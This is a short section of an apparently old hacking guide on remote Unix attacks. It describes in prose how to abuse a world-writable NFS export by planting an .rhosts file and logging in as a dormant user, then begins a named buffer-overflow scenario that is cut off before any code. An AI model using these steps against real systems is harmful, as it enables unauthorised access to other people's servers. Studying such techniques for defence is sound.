30.0 Unix Remote Attacks

A remote hack is when you attack a server you are not logged into. Usually this is done from another server, although in some cases you can do it from a regular PC (depending on the operating system).

Guessing a user account and password (unless it is a guest account) on a remote system is barely considered a remote hack, so we're not really cover that. We'll assume you don't know an account name and password on the remote system.

Remote hacks come in a couple of different flavors. Usually exploiting an existing service running on the victim server (which is misconfigured or allows too much access) is the goal. Exporting a NFS mount read/write to anyone might not be a bad thing, but if you can NFS mount directories containing .rhosts files, then it can be a very bad thing. Also, certain daemons running might be subject to buffer overflows remotely, allowing someone from a remote location run arbitrary commands on the victim server.

Here are a couple of examples:

You are root on a host named badguy.

You discover the host victim is exporting /home2/old read/writable to the world.

You also discover by fingering various accounts that user fred's home directory is /home2/old/fred and he hasn't logged in for months.

Quickly, you create a fred account on badguy.

Now you mount /home2/old and create an .rhosts file to establish trust with badguy.

After you become fred on badguy, you rlogin to the victim as fred.

Here's another attack involving a buffer overflow:

This remote system is running named.

You have written a named exploit that allows you to send arbitrary commands through the named daemon. It does a buffer overflow trick, you compile it and name it sploit.